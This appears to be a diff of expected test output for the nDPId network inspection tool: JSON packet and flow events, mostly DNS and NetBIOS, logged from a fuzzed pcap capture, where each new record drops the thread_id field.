00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW7bCABFABFIacwAAIARTYXAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW7bCABFABFIacwAAIARTYXAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469672183} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469672183}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1120469680186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469680186,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqMAR8XBQdaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1120469680186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469680186,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqMAR8XBQdaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
@@ -174,13 +174,13 @@
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1120469697462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469697462,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqUAR8a+QNeAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAxWAQAAJxAACwlsb2NhbGhvc3QA"} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1120469697462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469697462,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqUAR8a+QNeAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAxWAQAAJxAACwlsb2NhbGhvc3QA"}
00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00401{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120469697462,"pkt":"ADBUADRWAODtAW69CABFAAA+adiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120469697462,"pkt":"ADBUADRWAODtAW69CABFAAA+adiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120469697466} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120469697466}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1120469697468,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469697468,"pkt":"AODtAW69ADBUADRWCABFAABOAABAAEARt0vAqAEuwKgBAgA1CqYAOqrT7deBAAABAAEAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQAAJxAABNTyISM="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1120469697468,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469697468,"pkt":"AODtAW69ADBUADRWCABFAABOAABAAEARt0vAqAEuwKgBAgA1CqYAOqrT7deBAAABAAEAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQAAJxAABNTyISM="}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
01011{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":533,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":533,"pkt_l4_len":0,"thread_ts_msec":1120469697469,"pkt":"AODtAW69ADBUADRWCABFAAIHAAD6ADcRiibU8iEjwKgBAhPEE8QB877qU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDcxIFJFR0lTVEVSDQpGcm9tOiA8c2lwNXZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04fTVhMDBkDQpUbzIgPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWIwNjctMzIwYWQyZGEzDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTluNzA7cnBvZnQ9NTA2MDticmFuY2g9ejloRzRiS25wMTM4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":533,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":533,"pkt_l4_len":0,"thread_ts_msec":1120469697469,"pkt":"AODtAW69ADBUADRWCABFAAIHAAD6ADcRiibU8iEjwKgBAhPEE8QB877qU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDcxIFJFR0lTVEVSDQpGcm9tOiA8c2lwNXZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04fTVhMDBkDQpUbzIgPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWIwNjctMzIwYWQyZGEzDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTluNzA7cnBvZnQ9NTA2MDticmFuY2g9ejloRzRiS25wMTM4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":499,"global_ts_msec":1120469697621} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":499,"global_ts_msec":1120469697621}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -210,13 +210,13 @@
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1120469828958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469828958,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOah8AAIARTC7AqAHKwKgB\/wCJAIkAOluchP8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOa0JFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1120469828958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469828958,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOah8AAIARTC7AqAHKwKgB\/wCJAIkAOluchP8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOa0JFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469828958,"pkt":"ADBPADRWAODtAW69CABFAI1IaiAAAIARTTHAqAECwKgBAQqsADUANM1AXNgBAAABAAABgAAABF9zaXAEX3VkcANzMnAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469828958,"pkt":"ADBPADRWAODtAW69CABFAI1IaiAAAIARTTHAqAECwKgBAQqsADUANM1AXNgBAAABAAABgAAABF9zaXAEX3VkcANzMnAJY3liZXJjaXR5AmRrAAAhAAE="}
